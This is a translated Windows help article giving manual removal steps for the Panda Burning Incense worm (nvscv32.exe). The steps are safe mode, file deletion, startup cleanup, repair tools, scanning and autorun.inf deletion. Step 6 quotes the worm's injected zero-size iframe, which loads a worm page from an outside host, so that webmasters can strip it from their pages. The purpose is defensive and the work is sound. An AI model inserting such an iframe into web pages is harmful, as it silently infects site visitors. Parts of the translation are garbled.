Panda burning incense virus nvscv32.exe variant manual removal program (1)

  

First, PConline solution

1. Unplug the network;

2. Re-enter WinXP security mode, Panda The burning virus process is not loaded, you can use the "Task Manager"! (Hint: Press and hold F8 after booting)

3. Delete the virus file: %SystemRoot%\\system32\\drivers\ vscv32.exe.

4. Start Menu => Run, run the msconfig command. In the System Configuration Utility, cancel the process associated with nvscv32.exe. You can also use the Super Bunny Magic Settings
, HijackThis
, etc. to delete the registry startup items of nvscv32.exe.

Cancel the start of the Panda burning virus process

5. Download and use the Jiangmin kill tool to repair the infected exe file. And put on the Windows patch in time.

6. Clear Html/ASP/PHP, etc., the following code in all webpage files: (To prevent the propagation code from having three modifications, please change "." to ".")

< ;iframe src=http://www. Krvkr. Com/worm. Htrt width=”0” height=”0”></iframe>

Methods for bulk removal of malicious code:

  • You can use Dreamweaver for batch replacement.


    Dreamweaver use of batch replacement
    • Downloadable using BatchTextReplacer
      batch replacement.
    • Enterprises deploying Symantec AntiVirus can upgrade the malicious code and remove virus files by upgrading to the latest virus database to scan the entire file.

      7. Install anti-virus software, upgrade the virus database, scan the entire hard disk, and clear other virus files. Recommend "free Kaspersky" recommended by PConline - Active Virus Sheild. (xxxxxxxxxxxxx) (Note: Step 7 cannot be exchanged with step 5 to avoid the repairable poisoned files being deleted!)

      8. Delete the autorun.inf file in the root directory of each disk, using the search function. Delete Desktop_.ini all.

Copyright © Windows knowledge All Rights Reserved